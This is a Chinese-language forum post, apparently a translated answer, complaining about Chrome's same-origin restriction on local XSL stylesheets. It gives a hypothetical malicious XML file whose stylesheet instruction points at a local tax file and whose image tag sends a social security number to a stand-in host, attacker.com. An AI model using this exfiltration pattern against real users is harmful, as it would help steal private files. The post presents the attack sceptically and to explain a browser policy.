在Chrome Bug页面上需要一些解读——他们非常热衷于不解释问题的本质,以及为什么选择让每个人都遇到问题而不是让每个人都没有问题。
假设我有一个XML文件——在我的硬盘某个地方——例如:
C:\ Users\Ian\Documents\Taxes\StudioTaxReturn_2015.xml
并且某种恶意实体——以某种方式——成功向我的计算机中添加了一个恶意的XML文件,例如:
C:\Users\Ian\AppData\LocalLow\Temp\TrojanVirusWorm.xml
想象一下,TrojanVirusWorm.xml 包含一个样式表处理指令(PI):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>
攻击者指示我的浏览器导航到本地保存的trojanVirusWorm.xml
文件。
显然,有一种方法可以使XML文件读取 XSD文件的内容(而不是被XSD文件转换):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>
<!--And then a miracle happens, and this XML file is able to read
the contents of the stylesheet xml file-->
<html>
<img src="http://attacker.com/UploadSocialSecurityNumber&ssn=..."></img>
</html>
我不明白XML文件如何读取样式表文件。但Chrome团队向我们保证它是一种危险,而且无法解决。
其他浏览器都解决了这个问题。他们解决了它因为这不是一个问题。
file:
协议,Chrome 抛出了相同的域错误。 - user357812